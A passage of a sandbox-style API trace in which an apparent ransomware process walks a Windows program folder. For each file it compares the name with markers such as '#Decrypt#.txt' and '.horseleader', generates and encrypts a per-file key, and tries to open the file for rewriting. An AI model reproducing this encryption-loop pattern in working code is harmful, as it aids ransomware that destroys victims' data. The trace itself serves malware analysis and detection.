lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ede1450, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ede1450, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c7063e1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc8f, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Circle_SelectionSubpictureB.png", cAlternateFileName="")) returned 1 [0251.481] lstrcmpiW (lpString1="Circle_SelectionSubpictureB.png", lpString2="Windows") returned -1 [0251.481] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png") returned 79 [0251.481] StrStrIW (lpFirst="Circle_SelectionSubpictureB.png", lpSrch=".horseleader") returned 0x0 [0251.482] lstrcmpW (lpString1="Circle_SelectionSubpictureB.png", lpString2="#Decrypt#.txt") returned 1 [0251.482] lstrcmpW (lpString1="Circle_SelectionSubpictureB.png", lpString2="_uninstalling_.png") returned 1 [0251.482] lstrlenW (lpString=".testttjffg") returned 11 [0251.482] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png", lpSrch=".testttjffg") returned 0x0 [0251.482] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.482] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.482] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_selectionsubpictureb.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.484] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ee2d70a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ee2d70a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c9679c1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13c3, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Circle_VideoInset.png", cAlternateFileName="")) returned 1 [0251.484] lstrcmpiW (lpString1="Circle_VideoInset.png", lpString2="Windows") returned -1 [0251.484] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png") returned 69 [0251.484] StrStrIW (lpFirst="Circle_VideoInset.png", lpSrch=".horseleader") returned 0x0 [0251.484] lstrcmpW (lpString1="Circle_VideoInset.png", lpString2="#Decrypt#.txt") returned 1 [0251.484] lstrcmpW (lpString1="Circle_VideoInset.png", lpString2="_uninstalling_.png") returned 1 [0251.484] lstrlenW (lpString=".testttjffg") returned 11 [0251.484] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png", lpSrch=".testttjffg") returned 0x0 [0251.484] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.484] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.485] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.485] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ea030de, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ea030de, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c9fff39, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="cloud_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.485] lstrcmpiW (lpString1="cloud_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.485] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp") returned 67 [0251.485] StrStrIW (lpFirst="cloud_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.485] lstrcmpW (lpString1="cloud_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.485] lstrcmpW (lpString1="cloud_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.485] lstrlenW (lpString=".testttjffg") returned 11 [0251.485] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.486] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.486] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.486] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\cloud_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.486] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ee2d70a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ee2d70a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c9fff39, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5c9f, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Dot.png", cAlternateFileName="")) returned 1 [0251.486] lstrcmpiW (lpString1="Dot.png", lpString2="Windows") returned -1 [0251.486] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png") returned 55 [0251.486] StrStrIW (lpFirst="Dot.png", lpSrch=".horseleader") returned 0x0 [0251.486] lstrcmpW (lpString1="Dot.png", lpString2="#Decrypt#.txt") returned 1 [0251.487] lstrcmpW (lpString1="Dot.png", lpString2="_uninstalling_.png") returned 1 [0251.487] lstrlenW (lpString=".testttjffg") returned 11 [0251.487] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png", lpSrch=".testttjffg") returned 0x0 [0251.487] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.487] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.487] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.487] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ee799c4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ee799c4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4cb30a29, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x422c, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="DvdTransform.fx", cAlternateFileName="")) returned 1 [0251.487] lstrcmpiW (lpString1="DvdTransform.fx", lpString2="Windows") returned -1 [0251.487] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx") returned 63 [0251.488] StrStrIW (lpFirst="DvdTransform.fx", lpSrch=".horseleader") returned 0x0 [0251.488] lstrcmpW (lpString1="DvdTransform.fx", lpString2="#Decrypt#.txt") returned 1 [0251.488] lstrcmpW (lpString1="DvdTransform.fx", lpString2="_uninstalling_.png") returned 1 [0251.488] lstrlenW (lpString=".testttjffg") returned 11 [0251.488] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx", lpSrch=".testttjffg") returned 0x0 [0251.488] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.488] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.488] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\dvdtransform.fx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.488] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f43efc8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7fa6b2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f465237, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="FlipPage", cAlternateFileName="")) returned 1 [0251.488] lstrcmpiW (lpString1="FlipPage", lpString2="Windows") returned -1 [0251.489] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage") returned 56 [0251.489] lstrcmpW (lpString1="FlipPage", lpString2=".") returned 1 [0251.489] lstrcmpW (lpString1="FlipPage", lpString2="..") returned 1 [0251.489] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.489] GetProcessHeap () returned 0x780000 [0251.489] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.489] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\*") returned 58 [0251.489] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f43efc8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7fa6b2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f465237, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.493] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.494] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\.") returned 58 [0251.494] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.494] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f43efc8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7fa6b2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f465237, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.494] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.494] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\..") returned 59 [0251.494] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.494] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.494] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fe188e9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fe188e9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d019747, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0251.494] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0251.494] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\1047x576black.png") returned 74 [0251.494] StrStrIW (lpFirst="1047x576black.png", lpSrch=".horseleader") returned 0x0 [0251.494] lstrcmpW (lpString1="1047x576black.png", lpString2="#Decrypt#.txt") returned 1 [0251.495] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0251.495] lstrlenW (lpString=".testttjffg") returned 11 [0251.495] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\1047x576black.png", lpSrch=".testttjffg") returned 0x0 [0251.495] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.495] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.495] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.496] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fe3ea46, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fe3ea46, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d019747, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb04, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="203x8subpicture.png", cAlternateFileName="")) returned 1 [0251.496] lstrcmpiW (lpString1="203x8subpicture.png", lpString2="Windows") returned -1 [0251.497] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\203x8subpicture.png") returned 76 [0251.497] StrStrIW (lpFirst="203x8subpicture.png", lpSrch=".horseleader") returned 0x0 [0251.497] lstrcmpW (lpString1="203x8subpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.497] lstrcmpW (lpString1="203x8subpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.497] lstrlenW (lpString=".testttjffg") returned 11 [0251.497] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\203x8subpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.497] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.497] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.497] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\203x8subpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.498] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fed6fba, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fed6fba, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d019747, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.498] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.498] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_ButtonGraphic.png") returned 89 [0251.498] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.499] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.499] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.499] lstrlenW (lpString=".testttjffg") returned 11 [0251.499] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.499] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.499] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.499] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.500] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6feb0e5d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6feb0e5d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d019747, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.500] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.500] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png") returned 95 [0251.500] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.500] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.500] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.500] lstrlenW (lpString=".testttjffg") returned 11 [0251.500] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.500] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.500] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.500] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.501] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6feb0e5d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6feb0e5d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d03f8a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.501] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.501] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_ButtonGraphic.png") returned 90 [0251.501] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.501] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.501] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.501] lstrlenW (lpString=".testttjffg") returned 11 [0251.501] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.502] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.502] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.502] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.502] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fe64ba3, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fe64ba3, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d03f8a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.503] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.503] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_SelectionSubpicture.png") returned 96 [0251.503] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.503] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.503] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.503] lstrlenW (lpString=".testttjffg") returned 11 [0251.503] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.503] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.503] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 